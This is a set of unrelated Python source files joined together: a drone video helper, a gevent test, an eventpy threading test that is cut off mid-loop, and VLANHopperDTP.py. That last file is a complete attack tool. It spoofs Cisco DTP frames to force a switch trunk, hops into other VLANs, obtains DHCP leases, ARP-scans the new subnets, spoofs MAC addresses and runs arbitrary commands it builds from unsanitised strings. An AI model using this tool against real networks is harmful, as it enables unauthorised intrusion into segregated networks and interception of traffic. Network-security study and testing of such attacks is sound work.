def getDirectionForDrone(directions):
direction = ""
if {'North', 'East', 'West', 'South'}.issubset(set(directions)):
direction = 'Circle'
else:
direction = most_common(directions)
return direction
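# Illustrative sketch of how calculateAnchor(), getDirectionFromPoints() and
# getDirectionForDrone() fit together: track the marker centre over recent
# frames in a deque, collect per-frame directions, then reduce them to one
# command. `frames` is a hypothetical iterable of BGR images.
#
#   from collections import deque
#   points = deque(maxlen=32)
#   directions = []
#   for frame in frames:
#       center = calculateAnchor(frame)
#       if center is not None:
#           points.appendleft(center)
#           d = getDirectionFromPoints(points)
#           if isinstance(d, str):          # the early return yields a list, not a str
#               directions.append(d)
#   print(getDirectionForDrone(directions))  # e.g. 'East', 'Circle' or ''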
class BackgroundFrameRead:
"""
This class reads frames from a VideoCapture in the background. Call
backgroundFrameRead.frame to get the most recent frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger(self.__class__.__name__)
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
self.LOGGER = LOGGER
self.random_counter = 0
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
# cap is an opencv video capture
(self.grabbed, self.frame) = self.cap.read()
detected = detectRosePaper(self.frame)
if detected:
self.update_command({'detected': True})
# add filter and then on event trigger update_command
# update_command with the parameters
# once the command is sent, you can retrieve it in the main loop
def update_command(self, command_parameter):
video_event = pygame.event.Event(GameEvents.VIDEO_EVENT.value,
command_parameter)
pygame.event.post(video_event)
def stop(self):
self.stopped = True
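# Illustrative sketch of driving BackgroundFrameRead directly. It assumes a
# `tello` object with a `cap` attribute (as used in __init__ above); the Tello
# video stream address is usually 'udp://@0.0.0.0:11111'.
#
#   reader = BackgroundFrameRead(tello, 'udp://@0.0.0.0:11111').start()
#   try:
#       while not reader.stopped:
#           frame = reader.frame      # most recent decoded frame
#   finally:
#       reader.stop()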
|
test__issue600.py
|
# Make sure that libev child watchers, implicitly installed through the use
# of subprocess, do not cause waitpid() to fail to poll for processes.
# NOTE: This was only reproducible under python 2.
from __future__ import print_function
import gevent
from gevent import monkey
monkey.patch_all()
import sys
from multiprocessing import Process
from subprocess import Popen, PIPE
import greentest
def f(sleep_sec):
gevent.sleep(sleep_sec)
class TestIssue600(greentest.TestCase):
__timeout__ = greentest.LARGE_TIMEOUT
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_invoke(self):
# Run a subprocess through Popen to make sure
# libev is handling SIGCHLD. This could *probably* be simplified to use
# just hub.loop.install_sigchld
p = Popen([sys.executable, '-V'], stdout=PIPE, stderr=PIPE)
gevent.sleep(0)
p.communicate()
gevent.sleep(0)
def test_process(self):
# Launch
p = Process(target=f, args=(0.5,))
p.start()
with gevent.Timeout(3):
# Poll for up to 10 seconds. If the bug exists,
# this will timeout because our subprocess should
# be long gone by now
p.join(10)
if __name__ == '__main__':
greentest.main()
|
VLANHopperDTP.py
|
#!/usr/bin/python
#
# This script performs DTP Trunk mode detection and a VLAN Hopping
# attack automatically, then runs a sniffer to collect traffic from any
# other VLANs that become available.
#
# To be launched only in a Unix/Linux environment, as the script utilizes
# the following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# Python requirements:
# - scapy
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
#
# Mariusz B. / mgeeky, '18, <[email protected]>
#
import os
import re
import sys
import socket
import struct
import textwrap
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4'
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
subinterfaces = set()
cdpsCollected = set()
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_ALL = 0x0003  # used by the 802.1Q sniffer below when binding the raw socket
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.restype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
raise RuntimeError("recvmsg failed: rv=%d", rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
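#
# Illustrative sketch of reading one 802.1Q-tagged frame with the helpers above
# ('eth0' is a placeholder interface). enable_auxdata() makes recv() re-insert
# the VLAN tag that AF_PACKET strips by default, so scapy's Dot1Q layer sees it.
#
#   sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
#   sock.bind(('eth0', ETH_P_ALL))
#   enable_auxdata(sock)
#   pkt = Ether(recv(sock, 65535))
#   if pkt.haslayer(Dot1Q):
#       print('VLAN ID:', pkt.vlan)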
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
return ret
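# Illustrative, stand-alone way to exercise inspectPacket(): capture a single
# DTP frame with scapy ('eth0' is a placeholder interface; the BPF filter is
# the DTP SNAP protocol ID also used by sniffThread() below).
#
#   load_contrib('dtp')
#   frames = sniff(iface='eth0', filter='ether[20:2] == 0x2004', count=1, timeout=60)
#   if frames and frames[0].haslayer(DTP):
#       inspectPacket(frames[0])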
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
# OUT = Cisco, Code = DTP
snap = SNAP(OUI = 0x0c, code = 0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver = 1, tlvlist = [
DTPDomain(length = 13, type = 1, domain = '\x00\x00\x00\x00\x00\x00\x00\x00\x00'),
DTPStatus(status = '\x03', length = 5, type = 2),
DTPType(length = 5, type = 3, dtptype = '\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
time.sleep(config['timeout'] / 3)
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
#Logger.info('Started VLAN/802.1Q sniffer.')
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
#Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
if attackEngaged:
engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
# Supported placeholders in the command string:
#   %IFACE (interface), %HWADDR (MAC), %IP (address), %NET (network address),
#   %MASK (full mask), %GW (gateway), %CIDR (short mask)
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
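# Illustrative example of the placeholder expansion performed above. For a
# hopped subinterface such as 'eth0.10', a call like
#
#   launchCommand('eth0.10', 'arp-scan -I %IFACE %NET%CIDR &')
#
# replaces %IFACE with 'eth0.10' and %NET/%CIDR with the subnet address and
# prefix length read from the routing table, then runs the result via shell().
# The trailing '&' keeps the otherwise synchronous call from blocking.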
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
ret = False
for attempt in range(2):
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
def sniffThread():
global vlansDiscovered
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
Logger.err('Exception occurred during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
Logger.fail('It seems like no DTP frames were transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
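# Illustrative values (ioctl 0x8927 is SIOCGIFHWADDR):
#   getHwAddr('eth0')  -> '08:00:27:3c:9d:21'
#   getIfaceIP('eth0') -> '192.168.1.15'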
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q". Fatal error.')
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.')
return False
shell('modprobe 8021q')
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
if args.force:
config['timeout'] = 30
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
def main(argv):
global config
global stopThreads
global arpScanAvailable
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
if not assure8021qCapabilities():
Logger.err('Unable to proceed.')
return False
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
return True
if __name__ == '__main__':
main(sys.argv)
|
test_eventqueue_multithread.py
|
# eventpy library
# Copyright (C) 2020 Wang Qi (wqking)
# Github: https://github.com/wqking/eventpy
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from eventpy.eventqueue import *
import threading
import random
import time
import itertools
def test_multiThreading() :
threadCount = 64
dataCountPerThread = 1024
itemCount = threadCount * dataCountPerThread
eventList = [ x for x in range(itemCount) ]
random.shuffle(eventList)
queue = EventQueue()
dataList = [ 0 for x in range(itemCount) ]
for i in range(itemCount) :
def cb(d, i = i) :
dataList[i] += d
queue.appendListener(eventList[i], cb)
threadList = []
for i in range(threadCount) :
def cb(i = i) :
for k in range(i * dataCountPerThread, (i + 1) * dataCountPerThread) :
queue.enqueue(k, 3)
for k in range(10) :
queue.process()
threadList.append(threading.Thread(target = cb))
for thread in threadList :
thread.start()
for thread in threadList :
thread.join()
compareList = [ 3 for x in range(itemCount) ]
assert dataList == compareList
def doOneThreadWaits(testIndex) :
# note, all events will be processed from the other thread instead of the main thread
stopEvent = 1
otherEvent = 2
queue = EventQueue()
itemCount = 5
dataList = [ 0 for x in range(itemCount) ]
threadProcessCount = 0
def threadCb() :
nonlocal threadProcessCount
shouldStop = False
def listener1(index) :
nonlocal shouldStop
shouldStop = True
def listener2(index) :
dataList[index] += index + 1
queue.appendListener(stopEvent, listener1)
queue.appendListener(otherEvent, listener2)
while not shouldStop :
queue.wait()
threadProcessCount += 1
queue.process()
thread = threading.Thread(target = threadCb)
assert threadProcessCount == 0
def waitUntilQueueEmpty() :
while queue.waitFor(0.001) :
pass
def testEnqueueOneByOne() :
queue.enqueue(otherEvent, 1)
waitUntilQueueEmpty()
assert threadProcessCount == 1
assert queue.emptyQueue()
assert dataList == [ 0, 2, 0, 0, 0 ]
queue.enqueue(otherEvent, 3)
waitUntilQueueEmpty()
assert threadProcessCount == 2
assert queue.emptyQueue()
assert dataList == [ 0, 2, 0, 4, 0 ]
def testEnqueueTwo() :
queue.enqueue(otherEvent, 1)
time.sleep(0.01)
assert threadProcessCount == 1
assert queue.emptyQueue()
queue.enqueue(otherEvent, 3)
waitUntilQueueEmpty()
assert threadProcessCount == 2
assert dataList == [ 0, 2, 0, 4, 0 ]
def testBatchingEnqueue() :
with DisableQueueNotify(queue) :
queue.enqueue(otherEvent, 2)
time.sleep(0.01)
assert(threadProcessCount == 0)
assert not queue.emptyQueue()
queue.enqueue(otherEvent, 4)
time.sleep(0.01)
assert(threadProcessCount == 0)
assert not queue.emptyQueue()
waitUntilQueueEmpty()
assert threadProcessCount == 1
assert dataList == [ 0, 0, 3, 0, 5 ]
thread.start()
testList = [ testEnqueueOneByOne, testEnqueueTwo, testBatchingEnqueue ]
testList[testIndex]()
queue.enqueue(stopEvent, 1)
thread.join()
def test_oneThreadWaits() :
doOneThreadWaits(0)
doOneThreadWaits(1)
doOneThreadWaits(2)
def test_manyThreadsWait() :
queue = EventQueue()
stopEvent = 1
otherEvent = 2
unit = 3
itemCount = 30 * unit
dataList = [ 0 for x in range(itemCount) ]
shouldStop = False
def listener1() :
nonlocal shouldStop
shouldStop = True
def listener2(index) :
dataList[index] += 1
queue.appendListener(stopEvent, listener1)
queue.appendListener(otherEvent, listener2)
threadList = []
for i in range(itemCount) :
def cb(i = i) :
while True :
while not queue.waitFor(0.01) and not shouldStop :
pass
if shouldStop :
break
queue.process()
threadList.append(threading.Thread(target = cb))
for thread in threadList :
thread.start()
for i in range(itemCount) :
